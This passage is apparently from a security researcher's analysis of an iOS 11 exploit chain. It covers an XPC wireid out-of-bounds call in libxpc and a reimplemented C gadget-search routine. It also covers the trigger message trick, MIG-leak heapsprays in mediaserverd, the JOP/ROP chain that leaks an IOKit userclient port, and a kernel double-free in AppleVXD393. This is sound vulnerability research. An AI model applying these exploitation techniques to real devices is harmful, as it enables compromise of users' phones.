Not only has the prototype of skip_value changed; the precondition has changed too: it used to be the case that skip_value was responsible for verifying the wireid value in the message. That's no longer the case. The wireid value is passed directly to xpc_wire_length_from_wire_id where the lower 12-bits are shifted out and the upper 20 are used to directly index the xpc_types array. xpc_types is an array of pointers to Objective-C classes; the field at +0x90 is the wire_length function pointer, which will be called by skip_value.

What happened to all the bounds checking? Lots of code changed subtly here; the semantics of the functions changed and in the end a correct bounds check seems to have become a comparison against just a single invalid value.

Looking at the other xpc_wire_length_from_wire_id call-sites they are all dominated by calls to _xpc_class_id_from_wire_valid, which actually validates the wireid:

int xpc_class_id_from_wire_valid(uint32_t wireid)
{
  if (((wireid - 0x1000) < 0x1A000) &&
      ((wireid & 0xFFF00F00) == 0)) {
    return 1;
  }
  return 0;
}
It's very simple to hit this bug; anywhere between iOS 11.0 and 11.4.1 just flip a few bits in an XPC message and you'll probably hit it. This is why I believe that fuzzing or a unit test would have quickly found this issue.
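A test along the following lines would have flagged the regression immediately. It is a sketch rather than anything from libxpc: the two predicates restate the checks shown above, XPC_TYPES_ENTRIES assumes the xpc_types array has 0x1B entries (indexes 0 through 0x1A), and count_out_of_bounds is a hypothetical helper that brute-forces a range of wireid values.

```c
#include <assert.h>
#include <stdint.h>

#define XPC_TYPES_ENTRIES 0x1Bu  /* assumed number of xpc_types entries */

/* The iOS 11 check in skip_id_and_value. */
static int buggy_accepts(uint32_t wireid) {
    return wireid != 0x1B000u;
}

/* The check used at the other call sites. */
static int validated_accepts(uint32_t wireid) {
    return (wireid - 0x1000u) < 0x1A000u && (wireid & 0xFFF00F00u) == 0;
}

/* Count the wireids below limit which pass the given check but would
 * index past the end of the xpc_types array. */
static uint32_t count_out_of_bounds(int (*accepts)(uint32_t), uint32_t limit) {
    uint32_t bad = 0;
    for (uint32_t wireid = 0; wireid < limit; wireid++) {
        if (accepts(wireid) && (wireid >> 12) >= XPC_TYPES_ENTRIES)
            bad++;
    }
    return bad;
}
```

Over the first 0x100000 wireid values the validated check lets no out-of-bounds index through, while the != comparison lets through every one except 0x1B000 itself.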

XPC eXploitation
Let's take a closer look at exactly what will happen when the vulnerability is triggered:

int64 skip_id_and_value(xpc_serializer* serializer)
{
  uint32_t* wireid_ptr = xpc_serializer_read(serializer, 4, 0, 0);
  if (!wireid_ptr)
    return 0;

  uint32_t wireid = *wireid_ptr;
  if (wireid != 0x1B000)
    return skip_value(serializer, wireid);

xpc_serializer_read returns a pointer into the raw mach message buffer; it's just ensuring that there are at least 4 bytes left to read. As long as those 4 bytes don't contain the value 0x1B000, they'll pass the checks.

Let's look at the iOS 11 version of skip_value again:

int64
skip_value(xpc_serializer* serializer, uint32_t wireid)
{
  // declare function pointer
  uint32_t (*wire_length_fptr)(xpc_serializer*);

  wire_length_fptr = xpc_wire_length_from_wire_id(wireid);
  uint32_t wire_length = wire_length_fptr(serializer);
Each XPC type (eg xpc_dictionary, xpc_string, xpc_uint64) defines a function to determine how large their serialized payload is. For fixed-sized objects, such as an xpc_uint64, this will just return a constant (an xpc_uint64 payload is always 8 bytes):

__xpc_uint64_wire_length
MOV   W0, #8
RET
Similarly, an xpc_uuid object always has a 0x10 byte payload:

__xpc_uuid_wire_length
MOV   W0, #0x10
RET
For variable-sized types the length needs to be read from the serialized object:

__xpc_string_wire_length
B     __xpc_wire_length
All variable-sized xpc objects record their size in bytes directly after their wireid, so _xpc_wire_length just reads the next 4 bytes without consuming them.

_xpc_wire_length_from_wire_id looks up the correct function pointer to call:

// returns a pointer to the wire_length function for this wireid
uint32_t (*xpc_wire_length_from_wire_id(uint32_t wireid))(xpc_serializer*)
{
  return xpc_types[wireid >> 12]->wire_length;
}
xpc_types is an array of pointers to the relevant Objective-C class objects:

__xpc_types:libxpc:__const:DCQ 0libxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_nulllibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_boollibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_int64libxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_uint64libxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_doublelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_pointerlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_datelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_datalibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_stringlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_uuidlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_fdlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_shmemlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_mach_sendlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_arraylibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_dictionarylibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_errorlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_connectionlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_endpointlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_serializerlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_pipelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_mach_recvlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_bundlelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_servicelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_service_instancelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_activitylibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_file_transfer__xpc_ool_types:libxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_fdlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_shmemlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_mach_sendlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_connectionlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_endpointlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_mach_recvlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_file_transfer
The value at offset +0x90 in each xpc type's class object is its wire_length function pointer. That function pointer will be called with one argument, which is a pointer to the current xpc_serializer object.

This gives quite an interesting exploitation primitive:

They control an array index i, which can be between 0x1c and 0x100000 (since it's the upper 20 bits of the controlled wireid value). That will index the xpc_types array, in the const segment of the libxpc.dylib library in the shared cache. The code will read the pointer at the offset they provide (without bounds checking) then call the function pointer at offset +0x90 from that:

When F_PTR gets called, no register will point to controlled data. X0 will point to the current xpc_serializer, so that seems like the logical choice for targeting to make something more interesting happen. The relevant fields of an xpc_serializer object which can be indirectly controlled are:
+0x28 = buffer
+0x30 = buffer_size
+0x38 = current_position_in_buffer_ptr
+0x40 = remaining to be consumed
+0x48 = NULL
So the goal is to find a value i between 0x1C and 0x100000 such that the i'th pointer from the start of the xpc_types array contains a pointer to a structure, which at offset +0x90 has a function pointer which when called will do something interesting with the values at offsets +0x28 or +0x38 from X0, probably calling a function pointer from there and giving better register control.
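The relationship between the attacker-chosen wireid, the array index i and the memory that gets read can be written down as plain arithmetic. The helpers below are a hypothetical sketch; xpc_types_addr stands for wherever the xpc_types array happens to be mapped, and the 8-byte entry size follows from the DCQ entries in the listing above.

```c
#include <assert.h>
#include <stdint.h>

/* A wireid which makes xpc_wire_length_from_wire_id use index i
 * (i must fit in 20 bits). */
static uint32_t wireid_for_index(uint32_t i) {
    assert(i <= 0xFFFFFu);
    return i << 12;
}

/* Address of the 8-byte array slot read for a given wireid. */
static uint64_t slot_address(uint64_t xpc_types_addr, uint32_t wireid) {
    return xpc_types_addr + 8ull * (wireid >> 12);
}

/* The wire_length function pointer is then loaded from +0x90 in
 * whatever the slot points to. */
static uint64_t fptr_address(uint64_t type_struct_addr) {
    return type_struct_addr + 0x90;
}
```

Since the index has 20 bits and each slot is 8 bytes, the reachable window extends roughly 8MB beyond the start of xpc_types.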

Sounds fun! How do they do it?
One in a million
At runtime they check each possible value of i, looking for a situation where F_PTR ends up pointing to code which matches one of the two following signatures:

Candidate A:
upper 8 bits of previous instruction must be 0x17
upper 16 bits of target F_PTR instruction must be 0x17ff
next instruction must be 0xd1004000 (sub x0, x0, #0x10)

Candidate B:
gadget pointer must point to a sequence of 9 instructions matching the following template
0 STP             X20, X19, [SP,#-0x20]!
1 STP             X29, X30, [SP,#0x10]
2 ADD             X29, SP, #0x10
3 MOV             X19, X0
4 *
5 *
6 add x9, x8, #0x10
7 *
8 add x8, x8, #0x1e0
I re-implemented their gadget search code and tested it on a few devices to see what it finds:

#include "xpc.h"
#include <dlfcn.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

int syscall(int, ...);

void* xpc_null_create(void);

void find_it() {
  void* handle = dlopen("/usr/lib/system/libxpc.dylib", 2);
  if (!handle) {
    printf("unable to dlopen libxpc\n");
    return;
  }

  printf("handle: %p\n", handle);

  void* xpc_type_null = dlsym(handle, "_xpc_type_null");
  printf("xpc_type_null: %p\n", xpc_type_null);

  void** xpc_null = xpc_null_create();
  printf("xpc_null: %p\n", xpc_null);

  xpc_null -= 2;
  uint8_t* xpc_types = NULL;

  for (int i = 0; i < 0x10000; i++) {
    if (*xpc_null == xpc_type_null) {
      xpc_types = (uint8_t*)(xpc_null - 1);
      break;
    }
    xpc_null--;
  }

  if (xpc_types == NULL) {
    printf("didn't find xpc_types\n");
    return;
  }

  printf("found xpc_types here: %p\n", xpc_types);

  uint8_t* shared_cache_base = NULL;
  syscall(294, &shared_cache_base);
  printf("shared_cache_base: %p\n", shared_cache_base);

  // how big is the cache mapping which we can potentially point to?
  uint32_t mapping_offset = *(uint32_t*)(shared_cache_base+0x10);
  uint32_t n_mappings = *(uint32_t*)(shared_cache_base+0x14);

  uint8_t* mapping_info = shared_cache_base+mapping_offset;

  uint64_t cache_size = 0;
  for (int i = 0; i < n_mappings-1; i++) {
    cache_size += *(uint64_t*)(mapping_info+0x08);
    mapping_info += 0x20;
  }

  printf("cache_size: %llx\n", cache_size);

  for (int i = 0; i < 0x7fffff; i++) {
    // try each typeid and see what gadget we hit:
    uint8_t* type_struct_ptr = (xpc_types + (8*i));
    uint8_t* type_struct = *(uint8_t**)(type_struct_ptr);

    if ((type_struct > shared_cache_base) &&
        (type_struct < (shared_cache_base+cache_size)))
    {
      uint8_t* fptr = *(uint8_t**)(type_struct+0x90);
      if (fptr > shared_cache_base && fptr < (shared_cache_base + cache_size))
      {
        // view the candidate target as an array of 32-bit instructions
        uint32_t* instr = (uint32_t*)fptr;

        // try the shorter signature
        if (instr[-1] >> 0x18 == 0x17 &&
            instr[0] >> 0x10 == 0x17ff &&
            instr[1] == 0xD1004000) {
          printf("shorter sequence match at %p\n", fptr);
        }

        // try the longer signature
        uint32_t gadget[4] = {0xA9BE4FF4,  // STP X20, X19, [SP,#-0x20]!
                              0xA9017BFD,  // STP X29, X30, [SP,#0x10]
                              0x910043FD,  // ADD X29, SP, #0x10
                              0xAA0003F3}; // MOV  X19, X0

        if((memcmp(fptr, (void*)gadget, 0x10) == 0) &&
           instr[6] == 0x91004109 &&       // ADD X9, X8, #0x10
           instr[8] == 0x91078108)         // ADD X8, X8, #0x1e0
        {
          printf("potential initial match here: %p\n", fptr);
        }
      }
    }
  }
  printf("done\n");
}
The candidate B signature matches the following function in libfontparser:

TXMLSplicedFont::~TXMLSplicedFont(TXMLSplicedFont *__hidden this)

var_10= -0x10
var_s0=  0

STP   X20, X19, [SP,#-0x10+var_10]!
STP   X29, X30, [SP,#0x10+var_s0]
ADD   X29, SP, #0x10
MOV   X19, X0
ADRP  X8, #__ZTV15TXMLSplicedFont@PAGE ; `vtable for'TXMLSplicedFont
ADD   X8, X8, #__ZTV15TXMLSplicedFont@PAGEOFF ; `vtable for'TXMLSplicedFont
ADD   X9, X8, #0x10
STR   X9, [X19]
ADD   X8, X8, #0x1E0
STR   X8, [X19,#0x10]
ADD   X0, X19, #0x48 ; 'H' ; this
BL    __ZN13TCFDictionaryD2Ev ; TCFDictionary::~TCFDictionary()
ADD   X0, X19, #0x30 ; '0' ; this
BL    __ZN26TDataForkFileDataReferenceD1Ev ; TDataForkFileDataReference::~TDataForkFileDataReference()
MOV   X0, X19 ; this
LDP   X29, X30, [SP,#0x10+var_s0]
LDP   X20, X19, [SP+0x10+var_10],#0x20
B     __ZN5TFontD2Ev ; TFont::~TFont()
Candidate A matches a branch instruction to that same code:

B     0x1856b1cd4 ; TXMLSplicedFont::~TXMLSplicedFont()
Let's step through that TXMLSplicedFont destructor code to see what happens. Remember that at this point X0 points to an xpc_serializer object:

MOV   X19, X0
ADRP  X8, #__ZTV15TXMLSplicedFont@PAGE ; `vtable for'TXMLSplicedFont
ADD   X8, X8, #__ZTV15TXMLSplicedFont@PAGEOFF ; `vtable for'TXMLSplicedFont
ADD   X9, X8, #0x10
STR   X9, [X19]
This writes the TXMLSplicedFont vtable pointer over the first 8 bytes of the xpc_serializer; no problem.

ADD   X8, X8, #0x1E0
STR   X8, [X19,#0x10]
This writes another vtable pointer over the 8 bytes at offset +0x10; still fine.

ADD   X0, X19, #0x48 ; 'H' ; this
BL    __ZN13TCFDictionaryD2Ev ; TCFDictionary::~TCFDictionary()
This adds 0x48 to X0 and passes that pointer value as the first argument to the TCFDictionary destructor:

void TCFDictionary::~TCFDictionary(TCFDictionary *__hidden this)

var_10= -0x10
var_s0=  0

STP   X20, X19, [SP,#-0x10+var_10]!
STP   X29, X30, [SP,#0x10+var_s0]
ADD   X29, SP, #0x10
MOV   X19, X0
LDR   X0, [X19]
CBZ   X0, loc_18428B484
...
loc_18428B484
MOV   X0, X19
LDP   X29, X30, [SP,#0x10+var_s0]
LDP   X20, X19, [SP+0x10+var_10],#0x20
RET
Since the value at +0x48 will be NULL, this will just return. Back in ~TXMLSplicedFont:

ADD   X0, X19, #0x30 ; '0' ; this
BL    __ZN26TDataForkFileDataReferenceD1Ev ; TDataForkFileDataReference::~TDataForkFileDataReference()
This adds 0x30 to the xpc_serializer pointer and passes that to the TDataForkFileDataReference destructor:

TDataForkFileDataReference::~TDataForkFileDataReference(TDataForkFileDataReference *__hidden this)

B     __ZN18TFileDataSurrogateD2Ev ; TFileDataSurrogate::~TFileDataSurrogate()
This directly calls the TFileDataSurrogate destructor:

void TFileDataSurrogate::~TFileDataSurrogate(TFileDataSurrogate *__hidden this)

var_18= -0x18
var_10= -0x10
var_s0=  0

SUB   SP, SP, #0x30
STP   X20, X19, [SP,#0x20+var_10]
STP   X29, X30, [SP,#0x20+var_s0]
ADD   X29, SP, #0x20
MOV   X19, X0
ADRP  X8, #__ZTV18TFileDataSurrogate@PAGE ; `vtable for'TFileDataSurrogate
ADD   X8, X8, #__ZTV18TFileDataSurrogate@PAGEOFF ; `vtable for'TFileDataSurrogate
ADD   X8, X8, #0x10
STR   X8, [X19] ; trash +0x30; no problem
LDR   X0, [X19,#8] ; read from serializer+0x38, which is the pointer to the current position in the buffer
LDR   X8, [X0,#0x18]! ; read at offset +0x18, and bump up X0 to point to there
LDR   X8, [X8,#0x20] ; X8 is controlled now; read function pointer
BLR   X8 ; control!
On entry to this function X0 points 0x30 bytes into the xpc_serializer object. Let's recall those xpc_serializer fields again:

+0x28 = buffer
+0x30 = buffer_size
+0x38 = current_position_in_buffer_ptr
+0x40 = remaining to be consumed
+0x48 = NULL
STR  X8, [X19] will overwrite the buffer_size field with a vtable; could be interesting but it at least won't cause anything bad to happen right away.

The next instruction LDR  X0, [X19,#8] will load the xpc_serializer buffer position pointer in to X0; now X0 points in to the serialized xpc message buffer. They're definitely getting closer to arbitrary control now.

LDR  X8, [X0,#0x18]! will load the 8-byte value at offset +0x18 from the current xpc_serializer buffer position into X8, and update X0 to point to there. That means X8 could be arbitrarily-controlled, depending on the structure of the serialized XPC message.

The final two instructions then load a function pointer from an offset from X8 and call it:

LDR  X8, [X8,#0x20]
BLR  X8
It's quite neat really. I'd be interested to know the process behind finding this target gadget; it's a good candidate for techniques like symbolic execution. It could also have been found by just testing all the possible values and looking for interesting-looking crashes.
The message

At first glance (and a few subsequent glances) the code in the exploit which builds the trigger XPC message looks like it surely can't be a trigger:

xpc_dictionary = xpc_dictionary_create(0LL, 0LL, 0LL);
xpc_true = xpc_bool_create(1);
xpc_dictionary_set_value(xpc_dictionary, crafted_dict_entry_key_containing_value, xpc_true);
xpc_dictionary_set_value(xpc_dictionary, invalid_dict_entry_key, xpc_connection);
xpc_connection_send_message(xpc_connection, xpc_dictionary);
They create an XPC dictionary with two keys, and two values, then send it...? There must be more than meets the eye here, and indeed there is :)

Here's xpc_connection_serialize, circa iOS 11.0:

int64 xpc_connection_serialize(xpc_object* connection, xpc_serializer* serializer)
{
  syslog(3, "Connections cannot be directly embedded in messages. You must create an endpoint from the connection.");
}
All it does is log an error message and return. The problem here is that this gets the serializer out-of-sync. Specifically the xpc_dictionary serializer doesn't expect to be serializing non-serializable objects such as xpc_connections. The XPC dictionary serialization format is essentially a total length, followed by a sequence of alternating null-terminated keys and values. If a value serializer doesn't emit any bytes (such as the xpc_connection one above) then the serializer will continue to emit the next key in the dictionary, and then the next value. But there is no way in XPC to have a serialized dictionary key with no value; which means the XPC deserialization code is going to interpret the bytes of the following key as the previous key's value! Note that this isn't a security issue; the sender has arbitrary control of these bytes anyway, but it's a very neat trick to avoid having to write an entire XPC serialization library.
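The desync is easy to reproduce in a toy model. The sketch below is not the real XPC wire format: the `toy_` names, the one-byte bool tag and the absence of a length header are all assumptions made for illustration. It only shows that when one value serializer emits zero bytes, the bytes of the following key land exactly where a parser expects the previous key's value.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical value kinds for the toy format; not real XPC types. */
enum toy_kind { TOY_BOOL, TOY_CONNECTION };

struct toy_entry {
    const char *key;
    enum toy_kind kind;
};

/* Serializes one value and returns the number of bytes emitted. */
static size_t toy_serialize_value(enum toy_kind kind, unsigned char *out)
{
    if (kind == TOY_CONNECTION) {
        /* Mirrors xpc_connection_serialize: complain, emit nothing. */
        return 0;
    }
    out[0] = 'B';   /* made-up tag for a bool */
    out[1] = 1;     /* the bool's value */
    return 2;
}

/* Emits key, value, key, value, ... and returns the total length. */
size_t toy_serialize_dict(const struct toy_entry *entries, size_t n,
                          unsigned char *out, size_t cap)
{
    size_t off = 0;
    for (size_t i = 0; i < n; i++) {
        size_t klen = strlen(entries[i].key) + 1;   /* include the NUL */
        assert(off + klen + 2 <= cap);
        memcpy(out + off, entries[i].key, klen);
        off += klen;
        off += toy_serialize_value(entries[i].kind, out + off);
    }
    return off;
}

/* Offset at which a parser expects the value belonging to the first key. */
size_t toy_first_value_offset(const unsigned char *buf)
{
    return strlen((const char *)buf) + 1;
}
```

Serializing a dictionary whose first entry is a `TOY_CONNECTION` and whose second entry has the key "AAAA" leaves the bytes "AAAA" at the offset returned by `toy_first_value_offset`, so the sender chooses the "value" simply by choosing the next key.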

This is the relevant section of the serialized xpc dictionary. Using the xpc_connection_serialize trick the second key will be sent where a value should be such that the xpc lazy deserialization code will see the bad_wireID value as a wire_ID. When the out-of-bounds read occurs the xpc_serializer's current buffer position pointer will point just after the bad_wireID value. 0x18 bytes after that is a pointer to an address they target with a heapspray, and at offset +0x20 from that address a function pointer will be read and called.
Heapspray

They've reached the point where they need controlled data at a controlled address. The attackers decided to use a heapspray rather than do this in a controlled way (for example, by using another bug to disclose remote pointers).
They actually use two similar primitives to spray a large number of memory regions and mach port send rights in the target process.

I and others have published many writeups over the years about MIG and its complex ownership semantics. The focus was on places where those semantics lead to exploitable vulnerabilities, but those same complex semantics can also lead to resource leaks, which is precisely what the attackers are after here.

We'll return to the contents of the heapspray region later, but for now let's see how they leak it in the mediaserverd process. This daemon is targeted because its sandbox profile allows it to open a connection to the vulnerable IOKit driver used in the kernel exploit.
mediaserverd

mediaserverd hosts a lot of services; the attackers target one which is implemented in the Celestial framework. The targeted service starts with FigRecorderServerStart which calls bootstrap_check_in to get a receive right to vend the service. That port gets wrapped in a CFMachPort by CFMachPortCreateWithPort. From that CFMachPort they create a run loop source via CFMachPortCreateRunLoopSource. This sets up a basic mach message event handling system, where the following function will be called by the run loop code when a mach message is received on the service port:

void FIG_recorder_mach_msg_handler(CFMachPortRef cfport,
                                   mach_msg_header_t *request_msg,
                                   CFIndex size,
                                   void* info)
{
  char reply_msg[0x290];
  kern_return_t err;
  if ( request_msg->msgh_id == MACH_NOTIFY_DEAD_NAME ) {
    mach_dead_name_notification_t* notification =
      (mach_dead_name_notification_t*) request_msg;
    mach_port_name_t dead_name = notification->not_port;
    ...
    // look dead_name up in a linked-list and destroy
    // some resources if found
    ...
    // calls mach_port_deallocate
    FigMachPortReleaseSendRight(dead_name, 0, 0, 0, 0);
  } else {
    FIG_demux(request_msg, (mach_msg_header_t*)reply_msg);
    mach_msg((mach_msg_header_t*)reply_msg,
             1, // MACH_SEND_MSG
             ((mach_msg_header_t*)reply_msg)->msgh_size,
             0,
             0,
             0,
             0);
  }
}
CFMachPorts are a very simple wrapper around receiving mach messages; they know nothing about MIG. The callback for the CFMachPort must then take care of it.

This code presents many issues. Firstly, an anti-pattern that seems common across Apple code is the failure to check that the notification isn't spoofed; really the only proper way to correctly handle mach port lifetime notification messages is to never multiplex them onto service ports. They also parse the potentially spoofed message incorrectly; MACH_NOTIFY_DEAD_NAME notification messages don't carry rights and don't have the MSGH_COMPLEX bit set, yet they still drop a send right on a port name read from the body of the message.

But those bugs aren't relevant to what we're looking at; in the else branch they call the auto-generated MIG demux function:

int FIG_demux(mach_msg_header_t *msg_request, mach_msg_header_t *msg_reply)
{
  mig_routine_t routine;
  unsigned int routine_index;

  msg_reply->msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REPLY(msg_request->msgh_bits), 0);
  msg_reply->msgh_remote_port = msg_request->msgh_remote_port;

  msg_reply->msgh_size = (mach_msg_size_t)sizeof(mig_reply_error_t);
  msg_reply->msgh_id = msg_request->msgh_id + 100;
  msg_reply->msgh_local_port = MACH_PORT_NULL;
  msg_reply->msgh_reserved = 0;

  // an unsigned index means msgh_ids below 12080 wrap and fail the range check
  routine_index = msg_request->msgh_id - 12080;

  if (routine_index > 0x16 ||
      !(routine = FigRecorderRemoteServer_figrecorder_subsystem[routine_index].stub_routine)) {
    ((mig_reply_error_t *)msg_reply)->NDR = NDR_record_0;
    ((mig_reply_error_t *)msg_reply)->RetCode = MIG_BAD_ID;
    return FALSE;
  }

  (routine)(msg_request, msg_reply);
  return TRUE;
}
Note that it does return a value indicating whether the message was passed to a handler routine or not. But this is ignored by their CFMachPort handler. The CFMachPort handler also fails to check what the MIG return code was; and they completely fail to handle the cases when either the MIG method failed (and therefore, shouldn't have kept handles to any resources) or the msgh_id wasn't recognised (and therefore the request message wasn't handled at all.) This means that any unexpected messages will just be ignored rather than correctly destroyed (via eg mach_msg_destroy) and any resources contained in those messages will be leaked in the server process.

The exploit sends a mach message with msgh_id of 51, which isn't recognised by the FigRecorderRemoteServer_figrecorder_subsystem, so any resources contained in it are immediately leaked.

They send a mach message with 1,000 OOL memory descriptors, each of which contains 10MBs of copies of the same target 4kB block of memory containing the heapspray. They hope that one of these ends up  at the heapspray target address of 0x120808000. The virtual memory for received OOL memory descriptors will be allocated in the receiver by the kernel, via mach_vm_allocate. This uses a very basic lowest-to-highest first fit algorithm for allocation. This heapspray technique is therefore quite reliable, and due to the virtual memory optimisations used by XNU when sending OOL memory, quite low-overhead too.
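The numbers in that paragraph can be checked with a little arithmetic. The sketch below assumes that "10MB" means 10 * 1024 * 1024 bytes, that the 1,000 regions land back to back starting at some page-aligned address `base`, and that each region is filled with whole copies of the 4kB block. None of these are confirmed by the exploit and the base address used to exercise it is purely hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define SPRAY_REGIONS 1000ull                 /* OOL memory descriptors sent */
#define REGION_SIZE   (10ull * 1024 * 1024)   /* assumed size of each region */
#define BLOCK_SIZE    4096ull                 /* repeated heapspray block */

/* Nonzero if target falls inside the sprayed range that starts at base. */
int spray_covers(uint64_t base, uint64_t target)
{
    assert(base % BLOCK_SIZE == 0);
    return target >= base && target - base < SPRAY_REGIONS * REGION_SIZE;
}

/* Offset within the repeated 4kB block of the byte that ends up at target. */
uint64_t offset_in_block(uint64_t base, uint64_t target)
{
    assert(spray_covers(base, target));
    return (target - base) % BLOCK_SIZE;
}
```

Under these assumptions the spray spans roughly 9.8GB of virtual address space, so any first-fit starting point within that distance below 0x120808000 places a copy of the block there. Because the block repeats every 4kB, the content seen at a target address depends only on the low 12 bits of that address.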

As well as spraying memory they also spray mach port send rights, again abusing the fact that the targeted service doesn't implement a proper MIG server. They allocate over 12,000 receive rights, give themselves a send right to each, then move the receive rights into a portset. They send all the send rights via an out-of-line ports descriptor to the service, where the names are promptly leaked because of the improper message handling.

The reason they send so many send rights is to be able to guess a mach port name which will be valid in the mediaserverd task and for which the attacker holds the receive right. Then by sending mach messages to that port they can exfiltrate resources (such as IOKit user client connections) from the target.
JOP2ROP

The initial PC control sequence we saw earlier ended like this:

LDR  X8, [X0,#0x18]! ; read at offset +0x18, and bump up x0 to point to there
LDR  X8, [X8,#0x20]  ; X8 is controlled now; read function pointer
BLR  X8              ; PC control!
At the start of that sequence, X0 points to the end of the bad wireid value, so the first instruction will read a controlled qword from 0x18 bytes past the wireid into X8. The ! after the memory operand selects pre-indexed addressing with writeback: 0x18 is added to X0, the load uses that updated address, and X0 keeps the new value afterwards. 0x18 bytes past the bad wireid value they put the heapspray target pointer (0x120808080), so X8 has the value 0x120808080, and X0 is a pointer to the value 0x120808080.

The second instruction reads a qword from 0x1208080A0 into X8, and the third instruction calls that value.
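To make the register flow concrete, here is a small C emulation of those three instructions. It's only a sketch: `emulate_pc_control` is a made-up helper, it runs against ordinary process memory rather than a real xpc_serializer, and it returns the branch target instead of jumping to it.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/*
 * Emulates:
 *   LDR X8, [X0,#0x18]!   ; pre-index: X0 += 0x18, then X8 = *X0
 *   LDR X8, [X8,#0x20]    ; X8 = *(X8 + 0x20)
 *   BLR X8                ; returned here rather than called
 *
 * *x0 is updated in place to model the writeback.
 */
uintptr_t emulate_pc_control(uint8_t **x0)
{
    uintptr_t x8;

    assert(x0 != NULL && *x0 != NULL);

    *x0 += 0x18;                                   /* writeback to X0 */
    memcpy(&x8, *x0, sizeof x8);                   /* first load */
    memcpy(&x8, (const uint8_t *)x8 + 0x20, sizeof x8); /* second load */
    return x8;                                     /* BLR target */
}
```

If a buffer standing in for the message holds a pointer to a second buffer at offset +0x18, and that second buffer holds a chosen value at +0x20, the function returns the chosen value and leaves X0 pointing 0x18 bytes into the first buffer, which is the state the rest of the JOP chain starts from.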

Here's an annotated dump of the heapspray region which actually serves three separate purposes:
  1. places initial JOP gadget pointers at known locations
  2. is pivoted to as the ROP stack
  3. contains the outline mach messages to be sent back to the attacker's process via the sprayed send rights

offset +000 here is the heapspray target address of 0x120808080:

The local_ports[] array contains the addresses on the heapspray target pages of the exfil mach message's msgh_local_port fields. That's where the ROP writes 8 copies of the opened userclient port.

Those messages themselves are also on the heapspray page, with their msgh_remote_port fields filled in with the 8 guesses for the port-sprayed send rights.

After sending the trigger message the attackers listen for a message on the portset containing all the sprayed ports. If they receive a message with a msgh_id value of 0x1337 then the msgh_remote_port field (the reply port) contains a send right to the video decoding accelerator IOKit userclient which can't be accessed from inside the sandbox.
Video decoder accelerator repeated IOFree

The kernel bug is in the AppleVXD393 and D5500 userclients, which seem to be responsible for some sort of video decoding involving DRM and decryption.
I independently found this bug while reading through the symbol names in the iOS 12 beta 1 release (which Apple didn't strip symbols from), but by then it had already been fixed in stable builds. Of course, iOS kernels are normally stripped of symbols prior to release so it would have taken some reversing or fuzzing to find this otherwise.

The userclient has 9 external methods:

Generally, any IOKit userclient which has external methods with names that sound like they're involved in object lifetime management is suspicious. The lifetime of the userclient is handled implicitly by two things: its relationship to its owning mach port (which will cause no-senders notifications to be sent when there are no more clients) and OSObject references, which will cause the destruction of the object when there are no more references.

Looking through the list of methods immediately the second one jumps out; what might happen if we destroy a decoder twice?

The relevant code in the DestroyDecoder implementation is here:

AppleVXD393UserClient::DestroyDecoder(__int64 this, __int64 a2, _WORD *out_buf) {
  ...
  char tmp_buf[0x68];
  // make a temporary copy of the structure at +0x270 in the UserClient object
  memmove(tmp_buf, (const void *)(this + 0x270), 0x68uLL);

  // pass that copy to ::DeallocateMemory
  err = AppleVXD393UserClient::DeallocateMemory(this, tmp_buf);
  if ( err ) {
    SMDLog("AppleVXD393UserClient::DestroyDecoder error deallocating input buffer ");
  }

  // if the flag at +0x2e5 is set; do the same thing for the structure at
  // +0x2F8
  if ( *(_BYTE *)(this + 0x2E5) )
  {
    bzero(tmp_buf, 0x68uLL);
    memmove(tmp_buf, (const void *)(this + 0x2F8), 0x68uLL);
    err = AppleVXD393UserClient::DeallocateMemory(this, tmp_buf);
    if ( err )
      SMDLog("AppleVXD393UserClient::DestroyDecoder error deallocating decrypt buffer ");
  }

  // then clear the flag for the second deallocate
  *(_BYTE *)(this + 0x2E5) = 0;
This could still all be fine, depending on what ::DeallocateMemory actually does:

kern_return_t AppleVXD393UserClient::DeallocateMemory(__int64 this, __int64 tmp_buf)
{
  // reading this+0x290 for the first case
  VXD_desc = *(VXD_DEALLOC **)(tmp_buf + 0x20);
  if ( !VXD_desc )
    return 0LL;

  err = AppleVXD393::deallocateKernelMemory(*(_QWORD *)(this + 0xD8),
                                            *(_QWORD *)(tmp_buf + 0x20));

  // unlink the buffer descriptor from a doubly-linked list:
  prev = VXD_desc->prev;
  if ( prev )
    prev->next = VXD_desc->next;
  next = VXD_desc->next;
  if ( next )
    v7 = &next->prev;
  else
